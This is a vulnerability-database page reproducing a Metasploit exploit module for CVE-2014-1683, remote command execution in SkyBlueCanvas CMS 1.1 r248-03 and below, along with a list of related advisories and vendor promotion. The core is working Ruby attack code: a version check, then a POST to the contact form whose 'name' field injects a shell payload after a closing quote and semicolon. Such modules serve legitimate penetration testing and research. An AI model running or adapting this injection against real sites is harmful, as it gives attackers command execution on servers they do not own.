Lucene search
+L

SkyBlueCanvas CMS Remote Code Execution

🗓️ 28 Jan 2014 00:00:00Reported by Scott Parish, xistence <[email protected]>Type 
metasploit
 metasploit
🔗 www.rapid7.com👁 108 Views

SkyBlueCanvas CMS Remote Code Execution in version 1.1 r248-03 and belo

Related
Code
ReporterTitlePublishedViews
Family
zdt
zdt
SkyBlueCanvas CMS Remote Code Execution Exploit
4 Feb 201400:00
zdt
circl
Circl
CVE-2014-1683
24 Jan 201400:00
circl
checkpoint_advisories
Check Point Advisories
SkyBlueCanvas CMS Remote Command Execution (CVE-2014-1683)
23 Mar 201400:00
checkpoint_advisories
cve
CVE
CVE-2014-1683
29 Jan 201418:00
cve
cvelist
Cvelist
CVE-2014-1683
29 Jan 201418:00
cvelist
dsquare
Dsquare
Skybluecanvas 1.1 RCE
30 Aug 201400:00
dsquare
exploitdb
Exploit DB
Skybluecanvas CMS 1.1 r248-03 - Remote Command Execution
24 Jan 201400:00
exploitdb
exploitdb
Exploit DB
Skybluecanvas CMS - Remote Code Execution (Metasploit)
5 Feb 201400:00
exploitdb
nvd
NVD
CVE-2014-1683
29 Jan 201418:55
nvd
packetstorm
Packet Storm
SkyBlueCanvas CMS Remote Code Execution
1 Feb 201400:00
packetstorm
Rows per page
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'SkyBlueCanvas CMS Remote Code Execution',
        'Description' => %q{
          This module exploits an arbitrary command execution vulnerability
          in SkyBlueCanvas CMS version 1.1 r248-03 and below.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'Scott Parish', # Vulnerability discovery and exploit
          'xistence <xistence[at]0x90.nl>' # Metasploit Module
        ],
        'References' => [
          ['CVE', '2014-1683'],
          ['OSVDB', '102586'],
          ['BID', '65129'],
          ['EDB', '31183'],
          ['PACKETSTORM', '124948']
        ],
        'Privileged' => false,
        'Payload' => {
          # Arbitrary big number. The payload gets sent as an HTTP
          # response body, so really it's unlimited
          'Space' => 262144, # 256k
          'DisableNops' => true,
          'Compat' =>
                        {
                          'ConnectionType' => 'find',
                          'PayloadType' => 'cmd',
                          'RequiredCmd' => 'generic perl ruby telnet python'
                        }
        },
        'Platform' => %w{unix},
        'Targets' => [
          ['SkyBlueCanvas 1.1 r248', {}]
        ],
        'Arch' => ARCH_CMD,
        'DisclosureDate' => '2014-01-28',
        'DefaultTarget' => 0,
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )

    register_options(
      [
        OptString.new('TARGETURI', [true, "The path to the SkyBlueCanvas CMS installation", "/"]),
      ]
    )
  end

  def check
    uri = normalize_uri(target_uri.path.to_s, "index.php")

    res = send_request_raw('uri' => uri)

    if res && res.body.include?('SkyBlueCanvas [1.1 r248]')
      vprint_good("SkyBlueCanvas CMS 1.1 r248-xx found")
      return Exploit::CheckCode::Appears('The target appears to be vulnerable')
    end

    Exploit::CheckCode::Safe('The target is not vulnerable')
  end

  def exploit
    uri = normalize_uri(target_uri.path.to_s, "index.php")

    vprint_status("Sending request to #{uri}.")

    send_request_cgi({
      'method' => 'POST',
      'uri' => uri,
      'vars_get' => { 'pid' => '4' },
      'vars_post' =>
        {
          'cid' => '3',
          'name' => "#{rand_text_alphanumeric(10)}\";#{payload.encoded};",
          'email' => rand_text_alphanumeric(10),
          'subject' => rand_text_alphanumeric(10),
          'message' => rand_text_alphanumeric(10),
          'action' => 'Send',
          'mailinglist' => '0',
          'cc' => '0'
        }
    })
  end
end

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation